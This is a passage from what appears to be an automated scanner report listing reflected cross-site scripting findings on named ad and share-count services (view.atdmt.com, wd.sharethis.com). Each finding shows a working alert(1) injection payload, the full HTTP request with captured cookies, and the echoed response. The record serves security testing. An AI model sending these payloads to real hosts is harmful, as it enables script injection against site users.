Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:43 GMT
Connection: close
Content-Length: 6314

<html><head><title>Spotlight (Winter 2010-11) (Callout) (SMB)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/CJCNTAPBCHOM/RTS996_Callout_DefaultSpotlightOffers_228x123.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/136476400/directf9d2f';d4eceb18b55;ai.197896566;ct.1/01&clickTag=!~!click!~!http://clk.atdmt.com/go/136476400/directf9d2f';d4eceb18b55;ai.197896566;ct.1/01" />
...[SNIP]...

3.702. http://view.atdmt.com/CNT/iview/136476400/direct/01 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476400/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c03e3</script><script>alert(1)</script>e3cd68d2588 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476400/direct/01?click=c03e3</script><script>alert(1)</script>e3cd68d2588 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:35 GMT
Connection: close
Content-Length: 6402

<html><head><title>Spotlight (Winter 2010-11) (Callout) (SMB)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginHOM1294082394416();
var _HOM1294082394416_Instance =
{
click : "c03e3</script><script>alert(1)</script>e3cd68d2588",
clickThruUrl: "http://clk.atdmt.com/go/136476400/direct;ai.197896566;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click :
...[SNIP]...

3.703. http://view.atdmt.com/CNT/iview/136476400/direct/01 [click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476400/direct/01

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3129c'-alert(1)-'04fe496527f was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476400/direct/01?click=3129c'-alert(1)-'04fe496527f HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:36 GMT
Connection: close
Content-Length: 6292

<html><head><title>Spotlight (Winter 2010-11) (Callout) (SMB)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentHOM1294082394416 = _strContentHOM1294082394416.replace(/!~!click!~!/g,'');
else
_strContentHOM1294082394416 = _strContentHOM1294082394416.replace(/!~!click!~!/g,'3129c'-alert(1)-'04fe496527f');
}
else
{
_strContentHOM1294082394416 = '<a target="_blank" href="http://clk.atdmt.com/go/136476400/direct;ai.197896566;ct.1/01/" onclick="if(\'3129c'-alert(1)-'04fe496527f\')(new Image).src=
...[SNIP]...

3.704. http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476400/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6324"><script>alert(1)</script>501c5fe7578 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /CNT/iview/136476400/direct/01?click=&b6324"><script>alert(1)</script>501c5fe7578=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:36 GMT
Connection: close
Content-Length: 6382

<html><head><title>Spotlight (Winter 2010-11) (Callout) (SMB)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/136476400/direct;ai.197896566;ct.1/01/" onclick="if(\'&b6324"><script>alert(1)</script>501c5fe7578=1\')(new Image).src=\'&b6324">
...[SNIP]...

3.705. http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476400/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b15e2'-alert(1)-'5a57815b9c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476400/direct/01?click=&b15e2'-alert(1)-'5a57815b9c9=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:38 GMT
Connection: close
Content-Length: 6307

<html><head><title>Spotlight (Winter 2010-11) (Callout) (SMB)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentHOM1294082394416 = _strContentHOM1294082394416.replace(/!~!click!~!/g,'');
else
_strContentHOM1294082394416 = _strContentHOM1294082394416.replace(/!~!click!~!/g,'&b15e2'-alert(1)-'5a57815b9c9=1');
}
else
{
_strContentHOM1294082394416 = '<a target="_blank" href="http://clk.atdmt.com/go/136476400/direct;ai.197896566;ct.1/01/" onclick="if(\'&b15e2'-alert(1)-'5a57815b9c9=1\')(new Image)
...[SNIP]...

3.706. http://view.atdmt.com/CNT/iview/136476400/direct/01 [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/CNT/iview/136476400/direct/01

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e73dc"-alert(1)-"02dd6bb2ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /CNT/iview/136476400/direct/01?click=&e73dc"-alert(1)-"02dd6bb2ca6=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.wireless.att.com/businesscenter/business-programs/small/index.jsp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af:e2ff/25d1; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0:c46edc2/25d1/128fabed/e2ff/4db8a484

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 23:22:36 GMT
Connection: close
Content-Length: 6307

<html><head><title>Spotlight (Winter 2010-11) (Callout) (SMB)</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginHOM1294082394416();
var _HOM1294082394416_Instance =
{
click : "&e73dc"-alert(1)-"02dd6bb2ca6=1",
clickThruUrl: "http://clk.atdmt.com/go/136476400/direct;ai.197896566;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){},
click
...[SNIP]...

3.707. http://view.atdmt.com/COM/iview/305845687/direct [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://view.atdmt.com
Path:	/COM/iview/305845687/direct

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4cb9'%3bc3f3121bee0 was submitted in the REST URL parameter 4. This input was echoed as c4cb9';c3f3121bee0 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Request

GET /COM/iview/305845687/directc4cb9'%3bc3f3121bee0;pc.504470/01/2011.04.27.21.55.51?click= HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:58:59 GMT
Connection: close
Content-Length: 6238

<html><head><title>SWA_RR2.0_GOLF_300x250_swf</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
<param name="movie" value="HTTP://spe.atdmt.com/ds/C4COMSWA1SWA/2011_RR2/SWA_RR2.0_GOLF_300x250.swf?ver=1&clickTag1=!~!click!~!http://clk.atdmt.com/go/305845687/directc4cb9';c3f3121bee0;pc.504470;ai.209597449;ct.1/01&clickTag=!~!click!~!http://clk.atdmt.com/go/305845687/directc4cb9';c3f3121bee0;pc.504470;ai.209597449;ct.1/01" />
...[SNIP]...

3.708. http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/COM/iview/305845687/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80eed"-alert(1)-"fe3f83c06f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /COM/iview/305845687/direct;pc.504470/01/2011.04.27.21.55.51?click=&80eed"-alert(1)-"fe3f83c06f9=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:58:07 GMT
Connection: close
Content-Length: 6231

<html><head><title>SWA_RR2.0_GOLF_300x250_swf</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSWA1302713480147();
var _SWA1302713480147_Instance =
{
click : "&80eed"-alert(1)-"fe3f83c06f9=1",
clickThruUrl: "http://clk.atdmt.com/go/305845687/direct;pc.504470;ai.209597449;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id)
...[SNIP]...

3.709. http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/COM/iview/305845687/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 898a4"><script>alert(1)</script>4d1a71f891e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /COM/iview/305845687/direct;pc.504470/01/2011.04.27.21.55.51?click=&898a4"><script>alert(1)</script>4d1a71f891e=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:58:06 GMT
Connection: close
Content-Length: 6311

<html><head><title>SWA_RR2.0_SEATS_300x250_swf</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margi
...[SNIP]...
<a target="_blank" href="http://clk.atdmt.com/go/305845687/direct;pc.504470;ai.209601348;ct.1/01/" onclick="if(\'&898a4"><script>alert(1)</script>4d1a71f891e=1\')(new Image).src=\'&898a4">
...[SNIP]...

3.710. http://view.atdmt.com/COM/iview/305845687/direct [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/COM/iview/305845687/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e101b'-alert(1)-'d5f4349d530 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /COM/iview/305845687/direct;pc.504470/01/2011.04.27.21.55.51?click=&e101b'-alert(1)-'d5f4349d530=1 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:58:07 GMT
Connection: close
Content-Length: 6231

<html><head><title>SWA_RR2.0_GOLF_300x250_swf</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...

if ( "%OOB%" == "1" )
_strContentSWA1302713480147 = _strContentSWA1302713480147.replace(/!~!click!~!/g,'');
else
_strContentSWA1302713480147 = _strContentSWA1302713480147.replace(/!~!click!~!/g,'&e101b'-alert(1)-'d5f4349d530=1');
}
else
{
_strContentSWA1302713480147 = '<a target="_blank" href="http://clk.atdmt.com/go/305845687/direct;pc.504470;ai.209597449;ct.1/01/" onclick="if(\'&e101b'-alert(1)-'d5f4349d530=1\')(
...[SNIP]...

3.711. http://view.atdmt.com/COM/iview/305845687/direct [pc.504470/01/2011.04.27.21.55.51?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/COM/iview/305845687/direct

Issue detail

The value of the pc.504470/01/2011.04.27.21.55.51?click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee13c</script><script>alert(1)</script>079c2d043bb was submitted in the pc.504470/01/2011.04.27.21.55.51?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /COM/iview/305845687/direct;pc.504470/01/2011.04.27.21.55.51?click=ee13c</script><script>alert(1)</script>079c2d043bb HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:57:35 GMT
Connection: close
Content-Length: 6326

<html><head><title>SWA_RR2.0_GOLF_300x250_swf</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
e if (navigator.userAgent.toLowerCase().indexOf("webtv") != -1)
{
bIsRightVersion = (2 >= nRequiredVersion);
}
}
}
detectPluginSWA1302713480147();
var _SWA1302713480147_Instance =
{
click : "ee13c</script><script>alert(1)</script>079c2d043bb",
clickThruUrl: "http://clk.atdmt.com/go/305845687/direct;pc.504470;ai.209597449;ct.$num$/01/",
imgs : []
};
if (!window.armapi_a1_a1)
{
var armapi_a1_a1 =
{
initialize : function(unique_id){}
...[SNIP]...

3.712. http://view.atdmt.com/COM/iview/305845687/direct [pc.504470/01/2011.04.27.21.55.51?click parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://view.atdmt.com
Path:	/COM/iview/305845687/direct

Issue detail

The value of the pc.504470/01/2011.04.27.21.55.51?click request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cc845'-alert(1)-'c7940055e2 was submitted in the pc.504470/01/2011.04.27.21.55.51?click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /COM/iview/305845687/direct;pc.504470/01/2011.04.27.21.55.51?click=cc845'-alert(1)-'c7940055e2 HTTP/1.1
Host: view.atdmt.com
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AA002=1303072666-9018543; MUID=B506C07761D7465D924574124E3C14DF; ach00=903d/120af:fb75/120af; ach01=2a0cb15/120af/57ac7cf/903d/4db39163:b9e90a8/120af/f1fa4b0/fb75/4db416f0

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Type: text/html
Expires: 0
Vary: Accept-Encoding
Date: Wed, 27 Apr 2011 21:57:36 GMT
Connection: close
Content-Length: 6211

<html><head><title>SWA_RR2.0_GOLF_300x250_swf</title>
<meta HTTP-EQUIV="expires" CONTENT="0"></meta>
<meta HTTP-EQUIV="Pragma" CONTENT="no-cache"></meta>
</head><body style="border-width:0px;margin
...[SNIP]...
;
if ( "%OOB%" == "1" )
_strContentSWA1302713480147 = _strContentSWA1302713480147.replace(/!~!click!~!/g,'');
else
_strContentSWA1302713480147 = _strContentSWA1302713480147.replace(/!~!click!~!/g,'cc845'-alert(1)-'c7940055e2');
}
else
{
_strContentSWA1302713480147 = '<a target="_blank" href="http://clk.atdmt.com/go/305845687/direct;pc.504470;ai.209597449;ct.1/01/" onclick="if(\'cc845'-alert(1)-'c7940055e2\')(new Im
...[SNIP]...

3.713. http://wd.sharethis.com/api/getCount2.php [cb parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 199b6<script>alert(1)</script>06496acc1c5 was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /api/getCount2.php?cb=stButtons.processCB199b6<script>alert(1)</script>06496acc1c5&url=http%3A%2F%2Ftweetmyjobs.com%2F HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tweetmyjobs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 10:03:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 345

stButtons.processCB199b6<script>alert(1)</script>06496acc1c5({"url":"http:\/\/tweetmyjobs.com\/","wordpress":36,"other":8,"email":3722,"faves":1,"gbuzz":9,"facebook":465,"facebook2":780,"digg":2,"twitter":6329,"stumbleupon":4,"reddit":1,"yahoo_bmarks":4,"linked
...[SNIP]...

3.714. http://wd.sharethis.com/api/getCount2.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://wd.sharethis.com
Path:	/api/getCount2.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload bc364<img%20src%3da%20onerror%3dalert(1)>6f637796d71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bc364<img src=a onerror=alert(1)>6f637796d71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Ftweetmyjobs.co/bc364<img%20src%3da%20onerror%3dalert(1)>6f637796d71m%2F HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://tweetmyjobs.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
